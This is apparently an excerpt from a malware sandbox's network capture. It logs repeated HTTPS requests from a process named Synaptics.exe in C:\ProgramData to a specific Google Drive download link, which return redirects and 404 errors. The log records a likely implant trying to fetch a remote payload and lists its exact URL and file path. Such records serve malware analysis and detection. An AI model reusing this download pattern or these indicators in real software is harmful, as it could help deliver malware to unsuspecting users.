                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:28 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-v-jE2eAoovQVPkGWfJBbJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 6f 4d 51 32 62 4b 39 72 4e 34 43 42 37 6f 54 73 47 68 78 31 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="boMQ2bK9rN4CB7oTsGhx1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              134192.168.2.750180142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:27 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC619lobztDXgK_qeUDuYLwEHufRAVOwRwp99FgbWZm_0_neFgd5iM_mWOUfrbIgmVhRvGk3G8I
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:28 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-CVNN-gFkhcEdrsQfap1zgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 6f 32 5f 35 37 36 79 48 44 6d 65 6b 72 62 63 4a 4c 74 36 4f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="Qo2_576yHDmekrbcJLt6Og">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              135192.168.2.750179216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:27 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:28 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:28 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Mz-8VM3peUaqZfpUucwoaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              136192.168.2.750189216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:29 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:29 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-96-uz4hyDHHHEmUHkuOvZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              137192.168.2.750190142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7cfaJleRJ02IgCScZkWI-Ip82OdOXklo3TDf625DZMMF-vqv2vG1DBe6afWSjI0Ewh
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:29 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-v0KfeAktH00tcv8QYrLA2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 64 31 69 70 49 33 65 34 68 6c 6e 52 52 31 39 73 45 79 74 44 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="Id1ipI3e4hlnRR19sEytDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              138192.168.2.750188216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:29 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:29 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:29 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-rUNG0HL2bACTGSe4bA8oKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              139192.168.2.750191142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:29 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7h64zFbAwM5HZ0IbSCWKNCKI7ffN4jEQziI3k0v-EQ7ZH_wtnD9ey_IAb4JOQLsPgho60zqTY
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:29 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-p1ET6guYAgR2PUEOF1BTbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:29 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:29 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 70 67 4c 72 31 41 79 74 67 34 61 66 58 4d 35 38 38 61 53 65 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="kpgLr1Aytg4afXM588aSeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:29 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              140192.168.2.750194216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:30 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
